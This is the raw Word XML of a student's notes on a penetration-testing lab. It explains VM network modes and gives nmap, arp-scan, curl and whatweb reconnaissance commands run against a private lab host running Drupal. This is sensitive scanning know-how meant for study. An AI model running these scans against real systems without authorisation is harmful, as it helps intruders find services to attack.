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B9219" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ok  now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> want to learn some basics like the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEctin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 in the lab environment validation a brief on why it is  important and  what does NAT, bridged, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HOst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> only means and why do they matter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70CCF6" w14:textId="63E6E755" w:rsidR="002B480A" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in simple and clear words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4591E7" w14:textId="03FB2596" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DD96BA" w14:textId="53EC2FFE" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCFD755" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2C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</w:pPr>
      <w:r w:rsidRPr="001E2C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  <w:t>Network Types Explained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710"/>
        <w:gridCol w:w="4241"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="71BFB0DB" w14:textId="77777777" w:rsidTr="001E2C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92EC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Network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546AC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ED49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Analogy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="787FEA1A" w14:textId="77777777" w:rsidTr="001E2C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A942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A31CD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VM shares host's IP address. Host acts like a router.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63BB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Apartment building with one main address. All tenants share it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="5B8817A4" w14:textId="77777777" w:rsidTr="001E2C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DA4F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Bridged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F413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VM gets its own IP on the same network as host.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B3B8B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Each house has its own unique street address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="0C41EBDE" w14:textId="77777777" w:rsidTr="001E2C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C7BF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Host-Only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A3B6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 xml:space="preserve">VM can only talk to host and other Host-Only </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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VMs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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B2EDF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Private club - only members inside can talk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26F9F59F" w14:textId="580268BB" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F78B9E7" w14:textId="0580C94F" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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4645"/>
        <w:gridCol w:w="3489"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="61099643" w14:textId="77777777" w:rsidTr="001E2CF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14E71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1BE4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When to Use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E7AC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Lab Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="53C84655" w14:textId="77777777" w:rsidTr="001E2C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66DF1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t>NAT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9C15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Kali + targets need to communicate but stay isolated from outside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89D3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en-PK"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w: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 </w:t>
            </w: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t>Most common for labs</w:t>
            </w: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 xml:space="preserve"> - All </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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VMs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> see each other</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="646F7A1B" w14:textId="77777777" w:rsidTr="001E2C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0D2F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t>Bridged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A9E7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Need VM to be on same network as physical devices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D6FE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en-PK"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w: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 xml:space="preserve"> Can expose lab to real network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="707BACCF" w14:textId="77777777" w:rsidTr="001E2C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419D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t>Host-Only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FBC7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Testing isolated environment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CFAC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 Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:color w:val="0F1115"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w: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 xml:space="preserve"> Kali on NAT won't see Host-Only </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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VMs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38B78EE0" w14:textId="53A16B4C" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729E243D" w14:textId="37E12C00" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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322"/>
        <w:gridCol w:w="4662"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="15E65355" w14:textId="77777777" w:rsidTr="001E2CF7">
        <w:trPr>
          <w:gridAfter w:val="1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9B9C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br/>
              <w:t>NAT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AB173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t>Bridged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w14:paraId="5DACC46A" w14:textId="77777777" w:rsidTr="001E2CF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7B374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PK"/>
              </w:rPr>
              <w:t>IP Address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C3F3B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Private (e.g., 192.168.32.132)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2AF52" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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</w:pPr>
            <w:r w:rsidRPr="001E2CF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PK"/>
              </w:rPr>
              <w:t>Real IP from your router (e.g., 192.168.1.100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5461CEF2" w14:textId="47F7F85D" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFFEA2B" w14:textId="0AC73A0F" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180AFB0A" w14:textId="0CE0989B" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To check your own IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611AF670" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7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1E2CF7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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B21D1" w14:textId="626D1AD3" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C581471" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/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</w:pPr>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:rStyle w:val="token"/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  <w:t>Scan for all devices on network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14F956" w14:textId="0ED741CE" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">-scan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>–local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C785A6E" w14:textId="73043C6C" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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048EEB1B" w14:textId="79DE25A0" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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2E3A6086" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRPr="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E2CF7">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Test connection to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095BCFD" w14:textId="1F8E7B0B" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>ping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target-IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38131D87" w14:textId="5060A2CA" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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26520058" w14:textId="32E3E518" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF7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72D5803A" w14:textId="7275DF36" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7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en-PK"/>
        </w:rPr>
      </w:pP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PK"/>
        </w:rPr>
        <w:t xml:space="preserve">If ping fails but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PK"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spell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PK"/>
        </w:rPr>
        <w:t>-scan shows IP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en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve"> then use this command, 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-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Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 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en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">command enforces scan </w:t>
      </w:r>
      <w:r w:rsidR="005C24A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en-PK"/>
        </w:rPr>
        <w:t>bypassing ping or disabling firewall blocking the ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B215E6" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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Force scan - works even if ping is blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4EFC2" w14:textId="47FEEC19" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7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nmap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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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Pn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192.168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.32.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4693B" w14:textId="3935B05C" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7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5BBB8E8A" w14:textId="0A297409" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7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Nmap knocks on all </w:t>
      </w:r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>the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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>doors</w:t>
      </w:r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>( ports</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> )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of a device and tells you which ones are open and what's behind them</w:t>
      </w:r>
      <w:r w:rsidR="00BA4E70"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 xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7355214F" w14:textId="23EBBBB4" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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</w:p>
    <w:p w14:paraId="291BCF69" w14:textId="77777777" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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PORT     STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0C34A" w14:textId="77777777" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">   open     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">        ← Door 22 is open, running SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180C70B" w14:textId="77777777" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">   open     http       ← Door 80 is open, running a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460F70A" w14:textId="46F23930" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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443/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">  closed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t xml:space="preserve">   https      ← Door 443 is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588B855" w14:textId="2F011068" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70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6DF2DF0" w14:textId="4AF226F4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6CD4584" w14:textId="4BF0C1DA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E49AD6C" w14:textId="22A4E74B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Identifies the target's operating system AND the exact versions of services running on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB4A78" w14:textId="6AFF5E48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4078F2"/>
        </w:rPr>
        <w:t>-O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4078F2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>sV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61D0DD1A" w14:textId="121DF5D5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example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226CAACC" w14:textId="08371E8E" w:rsidR="005C24AF" w:rsidRP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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="459BD260" wp14:editId="42FF9870">
            <wp:extent cx="5731510" cy="3085465"/>
            <wp:effectExtent l="0" t="0" r="2540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E51D" w14:textId="26496985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961E0F1" w14:textId="77777777" w:rsidR="005C24AF" w:rsidRDefault="005C24AF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2F91736" w14:textId="7880D0C9" w:rsidR="00BA4E70" w:rsidRDefault="00BA4E70" w:rsidP="00BA4E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58CA05D" w14:textId="77777777" w:rsidR="00BA4E70" w:rsidRPr="00BA4E70" w:rsidRDefault="00BA4E70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</w:p>
    <w:p w14:paraId="7709364C" w14:textId="5209620D" w:rsidR="00BA4E70" w:rsidRDefault="002C4268" w:rsidP="001E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Scans every single port on the target, identifies what software is running, and runs basic security checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BFA04F" w14:textId="00D6997F" w:rsidR="002C4268" w:rsidRDefault="002C4268" w:rsidP="002C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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4268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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4268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2C4268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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4268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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4268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2C4268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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4268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sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4268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-p- </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4268"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192.168</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4268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.32.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB54F5" w14:textId="5D11CA44" w:rsidR="002C4268" w:rsidRDefault="002C4268" w:rsidP="002C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2088B669" w14:textId="77777777" w:rsidR="002C4268" w:rsidRPr="002C4268" w:rsidRDefault="002C4268" w:rsidP="002C42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</w:pPr>
      <w:r w:rsidRPr="002C426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  <w:t>What Each Part Does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246"/>
        <w:gridCol w:w="6166"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C4268" w:rsidRPr="002C4268" w14:paraId="250E348A" w14:textId="77777777" w:rsidTr="002C42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A8C6C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E080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8377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What It Does</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4268" w:rsidRPr="002C4268" w14:paraId="0B67E50D" w14:textId="77777777" w:rsidTr="002C42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2507A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-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002C42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1097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Version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5A81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Shows software and version (Apache 2.2.22, OpenSSH 6.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4268" w:rsidRPr="002C4268" w14:paraId="0C7BF90E" w14:textId="77777777" w:rsidTr="002C42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AE390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-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002C42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sC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DBDD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Default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76AE1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Runs common security scripts (enumeration, vulnerabilities)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4268" w:rsidRPr="002C4268" w14:paraId="2F9705E7" w14:textId="77777777" w:rsidTr="002C42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E5439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-p-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1C2C8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All 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A55B7" w14:textId="77777777" w:rsidR="002C4268" w:rsidRPr="002C4268" w:rsidRDefault="002C4268" w:rsidP="002C42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2C4268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Scans all 65,535 ports (not just top 1,000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E896EA5" w14:textId="77777777" w:rsidR="002C4268" w:rsidRPr="002C4268" w:rsidRDefault="002C4268" w:rsidP="002C4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6BD89B3D" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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A565B84" w14:textId="77777777" w:rsidR="001E2CF7" w:rsidRDefault="001E2CF7" w:rsidP="001E2CF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650BA95" w14:textId="77777777" w:rsidR="003E0A79" w:rsidRPr="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A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</w:pPr>
      <w:r w:rsidRPr="003E0A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  <w:t>Q7: Enumerate one open service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212DEC3" w14:textId="77777777" w:rsidR="003E0A79" w:rsidRPr="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A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3E0A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PK"/>
        </w:rPr>
        <w:t>Service chosen:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0A79"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  <w:t> Port 80 (HTTP - Drupal CMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F8C99C" w14:textId="77777777" w:rsidR="003E0A79" w:rsidRPr="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A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3E0A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PK"/>
        </w:rPr>
        <w:t>How I enumerated it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C413092" w14:textId="77777777" w:rsidR="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US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Quickly reveals the web server type, version, and CMS without downloading the whole page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B717EC7" w14:textId="11CCE077" w:rsidR="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A79">
      <w:pPr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3E0A7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curl</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0A7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3E0A7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-I</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0A7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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003E0A79">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>http://192.168.32.133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="126D98CB" w14:textId="7BCBE854" w:rsidR="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A79">
      <w:pPr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589CDA12" w14:textId="1820DBA5" w:rsidR="003E0A79" w:rsidRPr="005D2F94" w:rsidRDefault="003E0A79" w:rsidP="003E0A79">
      <w:pP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Instantly tells you what a website is built with - CMS, framework, version, server, and more in one command</w:t>
      </w:r>
      <w:r w:rsidR="005D2F94"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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005D2F94">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>so you can search for known vulnerabilities in those specific technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB58E3F" w14:textId="1864DE84" w:rsidR="005D2F94" w:rsidRPr="005D2F94" w:rsidRDefault="005D2F94" w:rsidP="003E0A79">
      <w:pP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 xml:space="preserve">Helps you when </w:t>
      </w:r>
      <w:r w:rsidRPr="005D2F94">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>you're hacking the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website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19850A" w14:textId="4C3B93F7" w:rsidR="003E0A79" w:rsidRDefault="003E0A79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yperlink"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E0A7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whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E0A7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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003E0A79">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>http://192.168.32.133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24A84ED6" w14:textId="67E534FE" w:rsidR="005D2F94" w:rsidRDefault="005D2F94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yperlink"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2ED887" w14:textId="77777777" w:rsidR="005D2F94" w:rsidRDefault="005D2F94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Hyperlink"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="87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744"/>
        <w:gridCol w:w="3533"/>
      </w:tblGrid>
